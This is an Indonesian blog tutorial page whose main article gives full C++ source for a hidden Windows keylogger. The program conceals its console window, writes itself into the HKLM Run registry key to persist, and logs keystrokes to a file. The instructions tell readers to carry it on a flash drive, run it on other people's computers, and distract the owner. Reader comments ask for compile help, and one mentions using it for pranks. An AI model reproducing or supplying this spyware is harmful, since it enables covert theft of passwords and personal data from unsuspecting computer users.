-->

K.E ^_~ Selamat Idul Fitri - Mohon Maaf Lahir Bathin

one stop tutorials
  1. Mengambil kode gambar untuk smiley chat facebook
  2. [Masking] Membingkai ombak dengan photoshop
  3. Rincian layanan pembuatan blog
  4. Merubah foto menjadi hitam putih dengan photoshop
  5. Ngeflood di yahoo! messenger dengan BUZZ
  6. Download nuptk web browser
  7. Alat sederhana pengubah sampah plastik menjadi minyak
  8. Cara keren membuat banyak folder
  9. 10 persiapan untuk menghadapi Ujian Nasional
  10. Install xampp di linux ubuntu
  11. 6 pertanyaan dasar seputar html
  12. Menghitung denyut jantung dengan sedotan
  13. Berkenalan dengan HTML
  14. Memakai kaskus smiley untuk facebook chat
  15. Huruf berwarna untuk facebook chat
  16. Sembunyikan file anda ke dalam gambar
  17. Cara simpel install windows 7
  18. Setting BIOS untuk booting melalui flashdisk
  19. Cara baru membuat status biru di facebook
  20. Test Otak!! Seberapa pintarkah anda
  21. Hutan buatan di tengah kota
  22. Membuat folder super hidden
  23. Jika Janin dapat bicara
  24. Membuat aplikasi penghitung luas dengan C++
  25. Cara menggunakan sqlmap pada backtrack
  26. Menambahkan fitur tab pada microsoft office
  27. Inilah presiden termiskin di dunia yang patut kita teladani
  28. Alay teks generator
  29. Membuat tulisan terbalik
  30. Melihat URL asli dari layanan pemendek URL
  31. Buka situs yang diblokir part (2)
  32. Mempercepat kinerja windows xp sp3
  33. Daftar referensi situs penting part(1)
  34. Daftar referensi situs-situs penting
  35. 4 langkah cek virus tanpa antivirus
  36. Hacker adalah
  37. Manfaat mengkonsumsi susu kedelai bagi yang suka begadang
  38. Metode compresing untuk mempercepat loading website/blog
  39. Mempercepat proses streaming video di youtube
  40. Download driver notebook, VGA, Windows, sound card etc
  41. Perbaikan Komputer Pada Kasus Windows Blue Screen Errors
  42. Download ebook di scribd.com tanpa register
  43. Membuat avatar dengan animasi teks
  44. Beginilah cara membuat status biru di facebook
  45. TTS Online bagian 2 (materi teknologi informasi)
  46. Teknologi yang memungkinkan kita membuat kue coklat dengan printer
  47. Membuat keylogger di flashdisk
  48. Menyembunyikan status dari beranda facebookmu
  49. Kunci jawaban teka-teki silang online V1
  50. Teka-teki silang Online
  51. Facebook shortcut keyboard
  52. Mengembalikan file yang terhapus
  53. SMS Gratis
  54. Kapitalisasi pendidikan
  55. Mikroskop digital untuk ilmuwan cilik
  56. All about punk
  57. Shortcut keyboard windows 7
  58. Memainkan game onet di windows 7
  59. Membangun toko online dengan wordpress
  60. Teka teki mbah Einstein
  61. 14 keyboard shortcut di windows 7
  62. Cara menemukan shortcut keyboard sendiri
  63. Belajar mengetik dengan 10 jari
  64. Teknik SEO MLM Backlink
  65. Menumbuhkembangkan karakter kebahasaan
  66. Produktifitas Karakter Respon Konservasi Berbasis Multiple Intelegence
  67. Pembelajaran Sains dalam Pendekatan Tematik
  68. Belajar Sains yang Membebaskan
  69. (PTK) Penerapan pendekatan kontekstual untuk meningkatkan kualitas pembelajaran Biologi SMP
  70. (PTK) Karakteristik pembelajaran Biologi
  71. (PTK) Hasil Penelitian dan pembahasan
  72. Mencari link asli dari foto kita di facebook
  73. Browsing dengan efek 3D dengan add ons firefox
  74. Manusia, sel, kromosom dan DNA
  75. Aku mau buat situs, harus register dimana?
  76. Membunuh akun facebook secara permanen
  77. Alasan bermigrasi ke domain sendiri
  78. Instalasi aplikasi sistem penjaminan mutu pendidikan part (1)
  79. Instalasi aplikasi sistem penjaminan mutu pendidikan part (2)
  80. Instalasi aplikasi sistem penjaminan mutu pendidikan Final
  81. Trik tersembunyi windows 7
  82. Membuat partisi harddisk di windows 7
  83. Yang baru di windows 7
  84. Cek saldo tabungan melalui HP
  85. Install windows tanpa CD
  86. 4 langkah persiapan update BIOS
  87. Chatting lewat HP dengan MXIT
  88. Domain khusus untuk situs porno
  89. Menilik video ariel
  90. Karakter aneh untuk nama file
  91. Penunjuk arah di belantara maya
  92. Shortcut keyboard photoshop CS2
  93. Steganografi teknik kamuflase file
  94. Karakteristik umum virus komputer
  95. Mengubah icon aplikasi dengan resource hacker
  96. Membasmi virus brontok
  97. Koleksi software
  98. Mengembalikkan file dan folder super hidden
  99. DNA windows
  100. Membuka registry yang terkunci
  101. Virtual mesin (komputer di dalam komputer)
  102. Proteksi file dengan FFP
  103. Jalan pintas membuka program
  104. Tiga tombol sakti
  105. Trik jitu sembunyikan folder pribadi

Baca lebih banyak tutorial »
Teka teki silang online

Teka-teki silang online

Premium Blogger Services

Membuat keylogger di flashdisk

Keylogger merupakan sebuah perangkat komputer baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik (wikipedia). Kalimat mudahnya keylogger adalah sebuah program yang dapat mencuri data akun (username, password) dengan cara merekam penekanan tombol pada keyboard.

Keylogger yang hendak kita buat menggunakan bahasa pemrograman C++, bagi agan yang belum paham apa itu C++ silahkan gugling, pelajari sendiri ya, jangan malas buat searching, reading n experiment. :P

langsung ja deh.,...ni POCny man teman....

• Pertama nte harus menyediakan flash disk ato USB (yang g jorok atau bebas virus ya, biar kompu orang g rusak).
• Lalu nte mesti download compiler C++. Bisa agan download di sini
• Setelah di install, open dan tulis code ini #copas juga buleh :P

#include 
#include 
#include 

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth;
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
 
    int test,create;
    test=test_key();
        
    if (test==2)
    {
        char *path="c:\\%windir%\\Log.exe";
        create=create_key(path);
          
    }
        
 
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
{
                    
    for(character=8;character<=222;character++)
{
    if(GetAsyncKeyState(character)==-32767)
{  
                            
     FILE *file;
    file=fopen("log.log","a+");
if(file==NULL)
{
return 1;
}            
if(file!=NULL)
{        
if((character>=39)&&(character<=64))
{
    fputc(character,file);
    fclose(file);
    break;
}        
    else if((character>64)&&(character<91))
{
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
}
    else
{
    switch(character)
{
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                    
            }
            return EXIT_SUCCESS;                            
}                                                

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
          
    reg_key=RegQueryValueEx(hKey,"Log",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
        
    RegCloseKey(hKey);
    return check;  
}
 
int create_key(char *path)
{  
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"Log",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}
 

• Nah, setelah itu nte Complie atau run, tapi enakan klik Rebuild All, bisa agan temukan di Execute>Rebuild All

• Nah berhubung program sudah jalan, wajib nte end process “Log.exe “nya di Windows Task Manager.Save program dengan nama “Log”.

• Sekarang, coba nte buka my document, pasti dah ada program nya “Log.exe” dan tempat hasil Log-an nya yang bernama “Log”

• Tetapi apabila anda ingin mengganti nama program nya menjadi nama yang anda ingin kan seperti contoh “Havizganteng”, bias anda ubah code nya di sini

char *path="c:\\%windir%\\Havizganteng.exe";

file=fopen("Havizganteng.log","a+");

reg_key=RegQueryValueEx(hKey,"Havizganteng",NULL,NULL,(LPBYTE)path,&buf_length);

RegSetValueEx((HKEY)hkey,"Havizganteng",0,REG_SZ,(BYTE *)path,strlen(path));

• Na, kan sudah menjadi folder, tinggal nte copy ke flash disk

• Selanjutnya, tinggal nte jalanin aja di kompu orang lain lewat flash disk nte, untuk menghentikan “Log.exe’ / Keylogger nya, bisa kalian end process di Windows Task Manager / ctrl+alt+delete

• Tetapi kalau yang punya kompu Tanya “ko flash disk nya g d lepas?”, na tinggal basa-basi da ama yang punya computer,, hehehehhehehehe


slese dah.,

Source:
Allah Swt,
armytheludher(Devilsc0de)

comment 20 komentar

  1. Berkunjung mencari ilmu yang bermanfaat, terima kasih sharingnya. Salam kenal yach

    BalasHapus
  2. yups, salam knal juga pasa, thanks kunjungnnya

    BalasHapus
  3. KURANG NGERTI GAN

    BalasHapus
  4. Nuwun Infona Mas.. Monggo Mampir di warung saya

    BalasHapus
  5. Gan koq ga bisa donlot :hammer:

    BalasHapus
  6. @anonim >> kan itu sourcenya dah ada gan, tinggal dicompile aja :)

    BalasHapus
  7. Halo, saya pernah lihat video cara mengakali keylogger di Http://youtube.com/watch?v=IJLjLCX2caE ,,,btw cara tsb bagus gak? bisa dipakaikah?
    Menurut saya sih lumayan... tapi bgm menurutmu kawan?
    Trims

    BalasHapus
  8. itu coding jalan g dengan borlan c++ gan
    mohon pncerahannya

    BalasHapus
  9. berarti flashdisk harus tetep nyangkut di kompi itu donk buat dapetin hasil'a..??
    terus aktifin'a gmn..??
    bgitu colok USB langsung otomatis pa manual..??

    BalasHapus
  10. ma'af gan punya saya mah gak bisa nih,,
    gagal di HWND stealth;di blok warna merah..
    mohon pencerahannya..
    nuhun..
    salam kenal..

    BalasHapus
  11. ma'af Gan,, percobaan saya mah gagal di HWND stealth; bi blok warna merah sama ada tanda x di pinggirnya pesanna undeclared ceunah,,
    mohon pencerahannya ahh..
    hatur nuhun..

    BalasHapus
  12. thanks nyott

    BalasHapus
  13. wah thank, brmnfaat bngt buat ngrjain orng hahahahahahahahahaha

    BalasHapus
  14. cara menggunakannya gimana ya? soalnya uda dibikin kok gg bisa ya???pusing aku

    BalasHapus
  15. gan mau nanya itu file jalan sendiri ato nggak?

    tlong balasnya ke email aku aja : himaludin@hotmail.co.id
    :D :D :D :D :D :D :D

    BalasHapus
  16. gan kok scriptnya susah di compile

    BalasHapus
  17. waktu di compile kog banyak yang warna merah scriptnya???

    BalasHapus
  18. sorry bro tapi lognya kan di pc ngk di flash jd percuma ditancep ap ngknya flash sama ja klo bwat net yang ada defrisx kan jg ilang it

    BalasHapus

Catatan:
Seluruh komentar yang masuk akan dimoderasi terlebih dahulu. Komentar yang berbau spam, kasar, menghina, seluruhnya yang bersifat menghancurkan bukan membangun tidak akan ditampilkan. Silahkan bertanya dan memberi pendapat dengan sopan dan sesuai aturan.

Anda diperbolehkan mempublikasikan ulang artikel ini, dengan syarat:
1. Mintalah izin dengan cara berkomentar di bawah artikel ini
2. Wajib menyertakan link ke artikel ini dan menyertakan nama penulis

 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x